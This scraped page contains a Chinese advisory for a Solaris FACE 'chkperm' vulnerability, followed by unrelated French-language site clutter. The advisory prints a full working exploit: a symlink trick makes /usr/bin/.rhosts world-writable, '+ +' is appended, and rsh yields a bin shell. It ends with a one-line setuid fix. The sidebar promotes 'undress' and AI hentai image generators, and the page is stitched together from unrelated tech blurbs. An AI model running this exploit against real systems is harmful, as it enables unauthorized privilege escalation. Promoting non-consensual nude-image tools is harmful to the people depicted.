Access Command Environment包含的漏洞
涉及程序: FACE软件包中的chkperm 描述: Access Command Environment包含的漏洞 详细: Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序chkperm是问题所在,
涉及程序:
FACE软件包中的chkperm
描述:
Access Command Environment包含的漏洞
详细:
Solaris 2.4, 2.5, and 2.5.1 (可能还有其他系统) 安装了一个叫 FACE (Framed Access Command Environment)的软件包。在这个软件包 中有一个程序"chkperm"是问题所在,他是用来用户是否有使用FACE许可的程序。 这漏洞将可以轻易造出一个BIN用户。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell... % id
uid=2(bin) gid=2(bin)
受影响的系统;
安装了(FACEFramed Access Command Environment)Solaris 2.4, 2.5 (?), 2.5.1(?) and 或其他源于System V 的UNIX系统。
解决方案:
CNNS为您提供完善的网络安全服务。
安全建议:
% chmod ug-s /usr/vmsys/bin/chkperm
Outils d'IA chauds
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Undress AI Tool
Images de déshabillage gratuites
Clothoff.io
Dissolvant de vêtements AI
AI Hentai Generator
Générez AI Hentai gratuitement.
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Comment convertir le pdf Deepseek
Feb 19, 2025 pm 05:24 PM
Deepseek ne peut pas convertir les fichiers directement en PDF. Selon le type de fichier, vous pouvez utiliser différentes méthodes: documents communs (Word, Excel, PowerPoint): utilisez Microsoft Office, LibreOffice et d'autres logiciels à exporter sous forme de PDF. Image: Enregistrer sous le nom de PDF à l'aide d'une visionneuse d'image ou d'un logiciel de traitement d'image. Pages Web: Utilisez la fonction "Imprimer en PDF" du navigateur ou l'outil Web dédié à PDF. Formats peu communs: trouvez le bon convertisseur et convertissez-le en PDF. Il est crucial de choisir les bons outils et d'élaborer un plan basé sur la situation réelle.
Comment lire le fichier dbf dans Oracle
May 10, 2024 am 01:27 AM
Oracle peut lire les fichiers dbf en suivant les étapes suivantes : créer une table externe et référencer le fichier dbf ; interroger la table externe pour récupérer les données dans la table Oracle ;
Interprétation de Botanix : BTC L2 décentralisé pour la gestion des actifs réseau (avec tutoriel interactif)
May 08, 2024 pm 06:40 PM
Hier, BotanixLabs a annoncé avoir finalisé un financement total de 11,5 millions de dollars américains, avec la participation de Polychain Capital, Placeholder Capital et d'autres. Le financement sera utilisé pour construire l’équivalent EVM décentralisé de BTCL2Botanix. Spiderchain combine la facilité d'utilisation d'EVM avec la sécurité de Bitcoin. Depuis la mise en ligne du testnet en novembre 2023, il y a eu plus de 200 000 adresses actives. Odaily analysera le mécanisme caractéristique de Botanix et le processus d'interaction testnet dans cet article. Botanix Selon la définition officielle, Botanix est un L2EVM décentralisé et complet de Turing construit sur Bitcoin et se compose de deux composants principaux : Ethereum Virtual Machine
Comment activer le contrôle du bureau à distance dans Win11_Comment activer le contrôle du bureau à distance dans Win11
May 08, 2024 pm 12:19 PM
1. Recherchez la page Panneau de configuration dans le menu Démarrer. 2. Modifiez ensuite l'affichage en Catégorie dans le panneau de configuration et cliquez sur Système et sécurité. 3. Recherchez et cliquez sur le bouton Allowremoteaccess sous Système. 4. Dans la fenêtre contextuelle, cliquez sur la colonne Propriétés du système distant, cochez la case Autoriser la connexion à distance à cet ordinateur et cliquez sur OK pour enregistrer.
Comment résoudre le problème de l'interface tiers renvoyant 403 dans l'environnement Node.js?
Mar 31, 2025 pm 11:27 PM
Résolvez le problème de l'interface tiers renvoyant 403 dans l'environnement Node.js. Lorsque nous utilisons Node.js pour appeler des interfaces tierces, nous rencontrons parfois une erreur de 403 à partir de l'interface renvoyant 403 ...
Partage de connexion Laravel Redis: pourquoi la méthode de sélection affecte-t-elle d'autres connexions?
Apr 01, 2025 am 07:45 AM
L'impact du partage des connexions redis dans Laravel Framework et sélectionnez Méthodes Lors de l'utilisation de Laravel Framework et Redis, les développeurs peuvent rencontrer un problème: grâce à la configuration ...
Quels sont les avantages du multithreading en C #?
Apr 03, 2025 pm 02:51 PM
L'avantage du multithreading est qu'il peut améliorer les performances et l'utilisation des ressources, en particulier pour traiter de grandes quantités de données ou effectuer des opérations longues. Il permet d'effectuer plusieurs tâches simultanément, améliorant l'efficacité. Cependant, trop de threads peuvent conduire à une dégradation des performances, vous devez donc sélectionner soigneusement le nombre de threads en fonction du nombre de cœurs CPU et de caractéristiques de tâche. De plus, la programmation multi-thread implique des défis tels que les conditions de blocage et de race, qui doivent être résolues à l'aide de mécanismes de synchronisation, et nécessite une connaissance solide de la programmation simultanée, pesant les avantages et les inconvénients et les utilisant avec prudence.
Comment éviter les interfaces tierces renvoyant 403 erreurs dans l'environnement nœud?
Apr 01, 2025 pm 02:03 PM
Comment éviter l'interface tiers renvoyant 403 erreur dans l'environnement de nœud. Lorsque vous appelez l'interface de site Web tiers à l'aide de Node.js, vous rencontrez parfois le problème de la retournement de l'erreur 403. � ...
